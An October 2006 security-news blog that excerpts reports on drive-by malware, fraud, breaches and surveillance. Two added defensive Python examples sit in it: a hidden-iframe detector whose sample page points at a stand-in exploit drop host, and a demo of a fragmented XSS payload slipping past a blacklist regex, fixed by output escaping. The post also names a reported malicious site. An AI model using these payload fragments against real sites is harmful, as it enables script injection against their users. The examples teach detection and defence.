A new research report contends that by failing to offer onboard encryption for e-mail files stored on Windows Mobile devices, Microsoft may be putting itself at a competitive disadvantage and leaving users vulnerable to data loss.

According to the latest report published by J. Gold Associates, a Northborough, Mass.-based wireless research firm, Microsoft's decision not to offer file encryption capabilities on its Windows Mobile platform reflects poorly on the technology compared to other popular wireless systems.

Unlike the push e-mail systems offered by rival mobile software makers including Good Technology, Research In Motion and Sybase, Microsoft's wireless messaging technology doesn't include data protection beyond simple passwords, researchers said.

More here.

Wednesday, October 25, 2006

Trick or Treat: Hallowe'en Malware Websites Abound


Make sure your personal firewall is tuned up, your AV is up-to-date, etc., because the bad guys have already started using iFrame exploits to drop malware onto the machines of unsuspecting users who visit Hallowe'en websites offering videos, wallpaper, sound files, etc.

This site:

http:// halloweensites.net/

... has been identified as a possible culprit.

Let's be careful out there, kids!

- ferg

(Props, Ivan!)
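The injected iFrames these kits plant are almost always invisible: zero-sized, styled display:none, or parked off-screen, and pointing at a host other than the page you are visiting. Here is an added example (my own, not code from the post or from any tool it mentions) of a check that flags that pattern in a fetched page. The HTML is constructed for the demo; example.net is the pretend Hallowe'en site and exploit.invalid the pretend drop site.

```python
"""Added example, not part of the original post: flag hidden or tiny
<iframe> tags pointing off-site, the drive-by pattern described above.
The sample page and host names are constructed for the demo."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: a legitimate same-site video embed, a third-party ad
# banner, and an injected 0x0 hidden iframe pointing at another host.
SAMPLE_PAGE = """<html><body>
<h1>Spooky wallpaper and sounds</h1>
<iframe src="http://example.net/player/pumpkin.swf" width="480" height="360"></iframe>
<iframe src="http://ads.example.org/banner" width="468" height="60"></iframe>
<iframe src="http://exploit.invalid/drop.html" width="0" height="0" style="display: none"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(value):
    """Parse '0', '1px' or '100%' into a number; unparseable -> None."""
    v = value.strip().lower().rstrip("px")
    try:
        return 100.0 if v.endswith("%") else float(v)
    except ValueError:
        return None


def suspicious_iframes(page_html, page_host):
    """Return (src, reasons) for iframes that are tiny, hidden, off-screen or off-site.

    Two independent signals are required before flagging, so an ordinary
    third-party ad or video embed (off-site but visible) is not reported.
    """
    parser = IframeCollector()
    parser.feed(page_html)
    results = []
    for attrs in parser.iframes:
        reasons = []
        src = attrs.get("src", "")
        style = attrs.get("style", "").replace(" ", "").lower()
        w = _dimension(attrs.get("width", ""))
        h = _dimension(attrs.get("height", ""))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("tiny")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden")
        if "left:-" in style or "top:-" in style:
            reasons.append("offscreen")
        host = urlparse(src).hostname
        if host and host != page_host:
            reasons.append("off-site")
        if len(reasons) >= 2:
            results.append((src, reasons))
    return results


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_PAGE, "example.net"):
        print(f"suspicious iframe: {src} ({', '.join(reasons)})")
```

This is a triage heuristic, not a verdict: a kit can just as easily use a visible 1x1 frame with no style attribute, or inject via script rather than a static tag, so the flagged URL still needs to be fetched in a sandbox and looked at.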

ACLU Uncovers FBI Surveillance of Maine Peace Activists

Via The ACLU.

The Maine Civil Liberties Union today released new documents revealing that the FBI has monitored the activities of peace activists, including Maine Veterans for Peace and Peace Action Maine.

The documents were turned over by the FBI in response to a Freedom of Information Act request filed by the MCLU. The FBI has previously released records detailing its surveillance of another local peace group, the Maine Peace and Justice Center.

More here.

Compromised PC Leads To Big Fraud Losses For E*Trade

Larry Greenemeier writes on InformationWeek:

A compromised PC opened the door for cyber attackers to wreak havoc on online broker E*Trade. The Securities and Exchange Commission, FBI, and other government enforcement agencies are investigating the crime, in which thieves conducted fraudulent transactions that cost the brokerage millions of dollars to cover customer losses.

E*Trade CEO Mitchell Caplan this week acknowledged during a conference call with financial analysts that his company "experienced a significant increase in losses resulting from fraud relating to identity theft." The fraudulent activity contributed to the $18 million in fraud losses the company reported during its third financial quarter. The company acknowledged in a statement that "the vast majority of online fraud is identity-theft related and is a result of a compromised personal computer."

More here.

Comcast Suffers Rash of VoIP, Broadband Outages

Alan Breznick writes on Light Reading:

Comcast Corp., the nation's biggest broadband provider, appears to be running into a rash of outages with its broadband and VOIP services in the Northeast U.S. this month, to judge from subscriber complaints.

In the latest incident, new Comcast Digital Voice customers in New Jersey reported problems with their VOIP service earlier today after the MSO completed what it termed "routine maintenance" on its cable plant last night. Subscribers said they lost phone service for several hours as Comcast technicians scrambled to locate the problem.

More here.

Political Toon: More Death of Habeas Corpus




U.S. Toll in Iraq

Via The Boston Globe (AP).

As of Wednesday, Oct. 25, 2006, at least 2,804 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes seven military civilians. At least 2,248 died as a result of hostile action, according to the military's numbers.

The AP count is two more than the Defense Department's tally, last updated Wednesday at 10 a.m. EDT.

More here.

And as always, cryptome.org keeps a very, very extensive list here, as does the Iraq Coalition Casualty Count website here.

Political Bloggers Coordinate 'Google Bombs'

A National Journal article by Heather Greenfield, via MSNBC, reports that:

The 2006 campaign is about to be "Google-bombed." Both liberal and conservative bloggers have embarked on plans to manipulate the Google search engine so that negative articles about the candidates they oppose appear near the top, potentially influencing undecided voters.

Liberal bloggers had the idea first. Chris Bowers of MyDD outlined the strategy Sunday. He said the plan involves purchasing "Google AdWords that will place each negative article on the most common searches for each Republican candidate. Simultaneously, I will produce an article on MyDD that embeds that negative article into a hyperlink."

Bowers asked bloggers to help add links, and they spent the next few days compiling negative news articles on Republican candidates in about 50 targeted races.

More here.

Blind Web Surfers Sue for Accessibility

An AP newswire article by Seth Sutel, via ABC News, reports that:

...like any evolving technology, accessing the Internet has hardly been a smooth ride for the blind. Some sites can be difficult to navigate, particularly if they contain relatively few text links and rely more on graphics and other visual elements that screen-reading software such as Jaws can't interpret.

That's why the NFB, an organization that represents blind people, is suing Target Corp., saying that its Web site is inaccessible to blind Internet users.

Last month a federal judge in California allowed the NFB's case to proceed, rejecting Target's argument that its Web site wasn't subject to the Americans With Disabilities Act, a 1990 law that requires retailers and other public places to make accommodations for people with disabilities. Target argued that the law only covered physical spaces.

More here.

Beginning Jan. 8, 2007, Anyone Entering U.S. by Air Must Carry Passport

David Armstrong writes in The San Francisco Chronicle:

A controversial rule requiring U.S. citizens and foreigners entering the country from Canada, Mexico and the Caribbean by air to carry passports will soon go into effect, even as complaints that the rule will slow international trade and befuddle tourists continue to be raised.

The State Department's Western Hemisphere Travel Initiative mandates the use of passports as of Jan. 8 for air travelers from neighboring countries in place of rules that allowed driver's licenses and birth certificates to do the job.

Moreover, as early as Jan. 1, 2008 -- and not later than June 1, 2009 -- the passport rule will go into effect for travelers arriving by land and sea from previously exempt neighboring countries.

More here.

Quote of the Day: Scott Adams

"As I write this, my Internet connection has been down for a day. I don’t want to sound as if I’m starting to panic or anything, but I’d be lying if I said I hadn’t given some thought to binge drinking."

- Scott Adams, over on The Dilbert Blog.

California: Man Allegedly Drugged, Burned After Meeting Brazilian Woman Online

Whoa.

John Coté writes in The San Francisco Chronicle:

Raymond Merrill bought a $5,000 engagement ring for Regina Filomena Rachid and declared in e-mails, "I have more kisses for you than there are stars in the sky."

Rachid's photos adorned his computer desktop and the walls in the San Bruno home he was fixing up. He had a stack of the Brazilian woman's glamour shots -- one with her topless, her jeans seductively unzipped partway. Wedding plans were discussed, messages on his computer show.

Merrill, a 56-year-old divorced carpenter and musician, thought he had found love online.

Instead, authorities believe Rachid lured Merrill to Brazil and masterminded a plot in which he was drugged for about six days until he disclosed his bank account information, then was strangled and his body set on fire, according to Merrill's sister, a friend and Brazilian news accounts.

More here.

Microsoft Decries Vista PatchGuard Hack

Matt Hines writes on eWeek:

Microsoft officials say they are unhappy that security software maker Authentium has decided to bypass the controversial PatchGuard kernel protection feature in its next-generation Vista operating system, and said that the tactic could lead to eventual problems for users of the company's software.

Responding to Authentium's move to circumvent PatchGuard in its products, company officials said that the decision to hack the feature could prove unwise for the security vendor as Microsoft will work to close off any flaws that allow unauthorized kernel interaction, making technologies dependent on such access obsolete.

As a result, users of applications that circumvent PatchGuard could find themselves unprotected from attack, or dealing with other problems driven by a lack of authorized integration between Vista and those products.

More here.

User Friendly: Bubble 2.0

Via UserFriendly.org.




Defense Tech: Northrop Advances Combat Laser Development

Via UPI.

Northrop Grumman Wednesday unveiled what it says is a major step toward development of a combat laser weapon for ground troops.

The experimental device known as Vesta was touted as expected to "greatly shorten the timeline for lasers to go from the laboratory to the battlefield," the company said in a news release issued by its Space Technology division in Southern California.

More here.

Another Breach at Los Alamos

An AP newswire article, via The Los Angeles Times, reports that:

A drug raid at a trailer park in New Mexico turned up what appeared to be classified documents taken from the Los Alamos nuclear weapons lab, the FBI said Tuesday.

Police found the documents while arresting a man suspected of domestic violence and dealing methamphetamine from his mobile home, said Sgt. Chuck Ney of the Los Alamos, N.M., Municipal Police Department. The documents were discovered during a search of the man's records for evidence of his drug business, Ney said.

Police alerted the FBI to the classified documents, which agents traced back to a woman linked to the drug dealer, officials said. The woman is a contract employee at Los Alamos National Laboratory, according to an FBI official who spoke on condition of anonymity because of the sensitive nature of the case.

The official would not describe the documents except to say that they appeared to contain classified material and were stored on a computer file.

More here.

Help Wanted: Cybercrime High On FBI Priority List

A TechWeb News article by K.C. Jones, via InformationWeek, reports that:

The FBI places cyber attacks among its top three priorities, said Mark Mershon, assistant director in charge of the New York City field office.

In fact, prevention is so important the crime-fighting agency will negotiate its normally strict employment standards for those with cyber backgrounds, he said.

Mershon gave a keynote address at the International Security Conference and Exposition (ISC) East and InfoSecurity 2006, which were held jointly Tuesday at the Jacob Javits Convention Center in New York City.

Behind terrorism and corporate espionage, cyber crime is high on the list of problems the FBI focuses on. Mershon said that although he considers cyber crime a relatively new means of carrying out traditional crimes, he said it requires different skill sets to investigate.

More here.

Secunia Reports Another IE7 Flaw

Ericka Chickowski writes on SC Magazine Online:

Secunia today reported a new vulnerability in Internet Explorer 7 (IE7) that can be exploited to conduct phishing attacks.

The vulnerability reporting firm said that an anonymous tip led them to the vulnerability, which allows the browser to display a popup with a spoofed address bar that has special characters appended to the URL. The vulnerability makes it possible to display only a part of the address bar, which could potentially fool users into believing in the pop-up's credibility.

The hole is listed as a "Less Critical" vulnerability by Secunia, which has a demonstration of the vulnerability on its site. According to Thomas Kristensen of Secunia, it might be possible for the vigilant user to spot something that isn't quite right when a pop-up occurs but he is worried about the danger to average users.

More here.

BT Snaps Up Counterpane Internet Security

Will Sturgeon writes on C|Net News:

Britain's BT Group has snapped up United States-based Counterpane Internet Security for a sum of more than $20 million as part of a continuing commitment to the security offering and overall growth of its Global Services business.

Counterpane provides managed network security services.

As part of the deal, Counterpane's founder, CTO and highly regarded security guru, Bruce Schneier, will join the BT payroll. Schneier will maintain his position as CTO within Counterpane, based in Mountain View, Calif.

More here.

Tuesday, October 24, 2006

Former AOL Execs Allegedly Lied to Auditors

An AP newswire article, via The New York Times, reports that:

Two former America Online executives and top officials at a defunct Las Vegas software maker lied to auditors as part of a scheme to boost both companies' revenue as the dot-com boom fizzled in 2001, government lawyers argued Tuesday.

Kent Wakeford, former executive director at AOL's business affairs unit, and John Tuli, a former vice president in AOL's NetBusiness unit, are among the four defendants on trial at U.S. District Court in Alexandria.

The men, along with two former executives at PurchasePro, are charged with securities fraud, making false statements to auditors and wire fraud. The defendants deny wrongdoing.

Well, of course they do...

More here.

Zero Day Flaw Found in MySpace

Via Dark Reading.

A researcher has published proof-of-concept code on a zero-day vulnerability he found on MySpace.com -- and another variation on the cross-site scripting (XSS) theme.

Called XSS fragmentation, the vulnerability consists of multiple chunks, or fragments, of JavaScript malware that can slip by a filter or firewall because individually they don't constitute a security risk. But when they are combined after hitting the site, they can then be dangerous.

More here.
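The fragmentation trick only works because the filter looks at each submitted field on its own while the page glues the fields together. Here is an added example (mine, not the researcher's proof-of-concept or MySpace's code) that shows the bypass against a per-field blacklist and why escaping at output time stops it regardless of how the input is split. The profile fields, the blacklist regex and the page template are invented for the demo.

```python
"""Added example, not from the article: a per-field blacklist passes two
harmless-looking fragments that form <script> once concatenated into the
page; HTML-escaping each field at output time defeats the same input.
Field names, filter rule and template are constructed for the demo."""
import html
import re

# A naive blacklist of the kind that inspects each field separately.
DANGEROUS = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)


def naive_filter_accepts(fields):
    """True when no single field contains an obviously dangerous token."""
    return not any(DANGEROUS.search(value) for value in fields.values())


def render_profile_unsafe(fields):
    """Build the profile page by concatenating the raw fields (the bug)."""
    return "<p>" + fields["first"] + fields["last"] + "</p>"


def render_profile_safe(fields):
    """Same layout, but every field is HTML-escaped at the output boundary,
    so no combination of fragments can form markup."""
    return "<p>" + html.escape(fields["first"]) + html.escape(fields["last"]) + "</p>"


def page_contains_script(page):
    """Does the rendered page contain something the blacklist would call a script?"""
    return DANGEROUS.search(page) is not None


# Constructed attacker input: neither half matches the blacklist on its own;
# "<scr" + "ipt>alert(1)</script>" only becomes a tag when the page joins them.
FRAGMENTED = {"first": "<scr", "last": "ipt>alert(1)</script>"}


if __name__ == "__main__":
    print("filter accepts fragments:", naive_filter_accepts(FRAGMENTED))
    print("unsafe page:", render_profile_unsafe(FRAGMENTED))
    print("safe page:  ", render_profile_safe(FRAGMENTED))
```

Note that the safe version does not try to recognise attacks at all; it encodes for the context the data lands in (here an HTML text node), which is the only defence that survives arbitrary splitting, encoding tricks and whatever the next variation on the XSS theme turns out to be. A field that lands inside an attribute, a URL or a script block needs the encoding appropriate to that context instead.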

FBI: Companies Need to Report Cyber Attacks

Scott Ferguson (no relation) writes on eWeek:

Companies should do more to report cyber-crimes such as hacking and phishing to help federal authorities investigate and ensure that additional data isn't compromised beyond initial attacks, a high-ranking FBI official said.

"A huge issue for us is the underreporting of successful or almost successful hacking," Special Agent Mark Mershin, the assistant director-in-charge of the FBI's New York City Office, told a crowd gathered here at the Infosecurity Conference and Exhibition on Oct. 24.

A 30-year FBI veteran, Mershin was appointed to his current position at the bureau's largest field office in May 2005. The expert spoke for a little more than an hour in a keynote address about the three most important issues facing the agency each day: counterterrorism, counterintelligence and cyber-crimes.

More here.

Firefox 2.0 Rocks


Yes, it does.

Highly recommended upgrade.

- ferg

Bizarre Story of the Day: 'Wrong IP Address' Leads to Shaq Attack on Innocent Family - Updated

Eric Bangeman writes on Ars Technica:

Anyone who follows the slate of lawsuits against music fans is cognizant of the crucial role that IP addresses play in attempts to cow suspected file sharers. But as we have seen time and time again, IP addresses are not consistently reliable means of identifying users. Law enforcement officials and a family in Gretna, Virginia, learned that lesson the hard way after their home was searched by a law enforcement team that included Miami Heat center Shaquille O'Neal, according to a law enforcement official.

The spectre of an angry, uniform-wearing Shaq, let alone an entire team of deputies and federal marshals, would be enough to turn one's knees to jelly. That's the sight apparently witnessed by farmer A.J. Nuckols, his schoolteacher wife, and three children last month when their home was raided and their computers, DVDs, video tapes, and other belongings were confiscated after they were connected to an IP address reportedly used to access child pornography on the Internet.

It turned out to be a case of mistaken identity. Nine days after the raid, an investigator told Nuckols that "the wrong IP address had been identified" and that he and his family would not be charged in the investigation. It's great that the Nuckols family is off the hook, but they now have to live with the stigma of having been the targets of a raid by law enforcement.

More here.

(Originally reported over on techdirt.com.)

AP Headline News updates this story: "Authorities: 'Deputy Shaq' Participated"

Security Vendor Bypasses Microsoft's Vista PatchGuard

Matt Hines writes on eWeek:

Security software maker Authentium says that it has created a new version of its flagship product that circumvents the PatchGuard kernel protection technology being added to Microsoft's next-generation Vista operating system.

The company, based in Palm Beach Gardens, Fla., maintains that it has built a version of its Authentium ESP Enterprise Platform that can bypass PatchGuard without setting off the desktop alarms produced by the security feature when the Vista kernel is compromised.

More here.

Florida 'Botmaster' Charged with Akamai DDoS Attack

Drew Cullen writes on The Register:

A Florida man was in federal court today, accused of launching a DDOS attack on Akamai which brought much of the internet to its knees - for a few hours.

John Bombard, 32, of Seminole is charged with hacking into two computer systems as part of a scheme to build a botnet of "zombie" PCs to attack Akamai. According to the FBI, Bombard compromised these systems using a variant of the GAOBOT worm. The bot network assembled for the Akamai attack included PCs at "two major universities", which are not named. The FBI alleges that Bombard "directed communication from the university computer systems to the bot network from a computer located on his domain, f0r.org".

More here.

Operator of 12 Hospitals Informs of Lost Data

An AP newswire article, via MSNBC, reports that:

The operator of 12 hospitals in Indiana and Illinois is notifying more than a quarter-million patients that compact discs containing their Social Security numbers and other personal information were lost for three days over the summer.

However, officials said they do not believe any of the 260,000 patients’ information was improperly accessed.

The Sisters of St. Francis Health Services, which operates 10 hospitals in Indiana and two in Illinois, said in the warning letter that an employee of a medical billing contractor copied the data onto several CDs in July and placed them in a new computer bag to work from home.

More here.

Microsoft: Bot, Trojan Infections High; Rootkits Low

Ryan Naraine writes on eWeek:

New statistics from Microsoft's anti-malware engineering team have confirmed fears that backdoor Trojans and bots present a "significant" threat to Windows users.

However, according to data culled from the software maker's security tools, stealth rootkit infections are on the decrease, perhaps due to the addition of anti-rootkit capabilities in security applications.

The latest malware infection data, released at the RSA Europe conference in Nice, France, covers the first half of 2006. During that period, Microsoft found more than 43,000 new variants of bots and backdoor Trojans that control millions of hijacked Windows machines in for-profit botnets.

Of the 4 million computers cleaned by the company's MSRT (malicious software removal tool), about 50 percent (2 million) contained at least one backdoor Trojan. While this is a high percentage, Microsoft notes that this is a decrease from the second half of 2005. During that period, the MSRT data showed that 68 percent of machines cleaned by the tool contained a backdoor Trojan.

More here.

Haxdoor: UK Police Count 8,500 Victims in Data Theft (So Far)

Jeremy Kirk writes on InfoWorld:

British electronic-crime detectives are investigating a massive data theft operation that stole sensitive information from 8,500 people in the U.K. and others in some 60 countries, officials said Tuesday.

In total, cybercriminals targeted 600 financial companies and banks, according to U.K. authorities, who have worked over the past week to identify and notify victims.

Through intelligence sources, U.K. police were given several gigabytes of data -- around 130,00 files -- that came from a server in the U.S., said Charlie McMurdie, detective chief inspector for the Specialist Crime Directorate e-Crime Unit of the London Metropolitan Police. Most of the data related to financial information, she said.

The data was collected by a malicious software program nicknamed Haxdoor that infected victims' computers. Some 2,300 machines were located in the U.K. McMurdie said.

More here.

Laptops Give Up Secrets to U.S. Customs Agents

A New York Times article by Joe Sharkey, via The International Herald Tribune, reports that:

A lot of business travelers are walking around with laptops that contain private corporate information that their employers really do not want outsiders to see.

Until recently, their biggest concern was that someone might steal the laptop. But now there's a new worry - that the laptop will be seized or its contents scrutinized at U.S. customs and immigration checkpoints upon entering the United States from abroad.

Although much of the evidence for the confiscations remains anecdotal, it's a hot topic this week among more than a thousand corporate travel managers and travel industry officials meeting in Barcelona at a conference of the Association of Corporate Travel Executives.

More here.

Former CIA Chief Joins Qinetiq

Hans Kundnani writes on The Guardian.co.uk:

Qinetiq, the controversially privatised British defence and security technology company, has appointed George Tenet - the CIA chief at the time of 9/11 - as a non-executive director.

Mr. Tenet was widely criticised for intelligence failures in the period before the September 11 terrorist attacks and in the run-up to the Iraq war.

According to Washington Post journalist Bob Woodward's book Plan of Attack, Mr Tenet told President Bush it was a "slam dunk" that Saddam Hussein possessed weapons of mass destruction.

More here.

FCC Action on AT&T Deal Hits Roadblock

Jim Puzzanghera writes in The Los Angeles Times:

Robert McDowell's confirmation in May as the fifth member of the Federal Communications Commission was supposed to end a 2-2 partisan deadlock that had stymied the agency on several issues for more than a year.

But with commission approval all that's standing in the way of AT&T Inc.'s purchase of BellSouth Corp., it's back to stalemate again at the FCC because of the occasional bane of regulatory agencies — a recusal.

McDowell, a Republican who holds the tiebreaking vote, has removed himself from voting on the $83-billion purchase because he used to lobby for an association of smaller phone companies that opposes the deal.

His decision has given the commission's two Democrats leverage to hold up approval unless some of their conditions are met, such as preventing the companies from charging for priority delivery of services over their Internet lines — a controversial issue known as network neutrality.

More here.

Schneier: Airline Passenger Profiling for Profit

Bruce Schneier writes:

I have previously written and spoken about the privacy threats that come from the confluence of government and corporate interests. It's not the deliberate police-state privacy invasions from governments that worry me, but the normal-business privacy invasions by corporations -- and how corporate privacy invasions pave the way for government privacy invasions and vice versa.

The U.S. government's airline passenger profiling system was called Secure Flight, and I've written about it extensively. At one point, the system was going to perform automatic background checks on all passengers based on both government and commercial databases -- credit card databases, phone records, whatever -- and assign everyone a "risk score" based on the data. Those with a higher risk score would be searched more thoroughly than those with a lower risk score. It's a complete waste of time, and a huge invasion of privacy, and the last time I paid attention it had been scrapped.

But the very same system that is useless at picking terrorists out of passenger lists is probably very good at identifying consumers.

More here.

This also seems like a good time to mention UnSecureFlight.com...